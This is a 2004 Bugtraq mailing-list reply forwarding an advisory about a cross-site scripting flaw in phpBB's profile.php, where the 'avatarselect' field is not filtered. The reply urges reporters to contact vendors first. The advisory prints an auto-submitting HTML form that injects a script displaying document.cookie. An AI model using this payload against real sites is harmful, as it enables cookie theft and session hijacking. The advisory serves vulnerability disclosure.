<<< Date Index >>>     <<< Thread Index >>>

RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability



I'm going to say this again. Please contact security@ before posting here,
and give them an appropriate amount of time to reply. This goes for _any_
software company. Thank you.

----- Original Message ----- 
From: "Cheng Peng Su" <apple_soup@xxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Saturday, March 20, 2004 10:36 PM
Subject: phpBB profile.php Cross Site Scripting Vulnerability


|
|
|
| #####################################################################
|
|  Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
|   Release Date : Mar 21,2004
|    Application : phpBB
|        Version : phpBB 2.0.6d or others?
|       Platform : PHP
|     Vendor URL : http://www.phpbb.com/
|         Author : Cheng Peng Su(apple_soup_at_msn.com)
|
| #####################################################################
|
|  Proof of Conecpt:
|
|      This vuln is in profile.php,when you click [Show Gallery],phpBB
|   will show you Avatar gallery,asking you to choose one for yourself.
|   The hole is in the form,after submitting phpBB will use the value of
|   "avatarselect" as the path of the gallery directly,without filtering
|   any illegal characters.
|
|  Exploit:
|
|   -------------exploit.htm--------------
|   <form name='f' action="http://site/profile.php?mode=editprofile";
method="post">
|   <input name="avatarselect" value='"
><script>alert(document.cookie)</script>'>
|   <input type="submit" name="submitavatar" value="Select avatar">
|   </form>
|   <script>
|   window.onload=function()
|    {
|     document.all.submitavatar.click();
|    }
|   </script>
|   ---------------end-------------------
|
|  Contact:
|
|   Cheng Peng Su
|   Class 1,Senior 2,High school attached to Wuhan University
|   Wuhan,Hubei,China(430072)
|   apple_soup_at_msn.com
|


--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .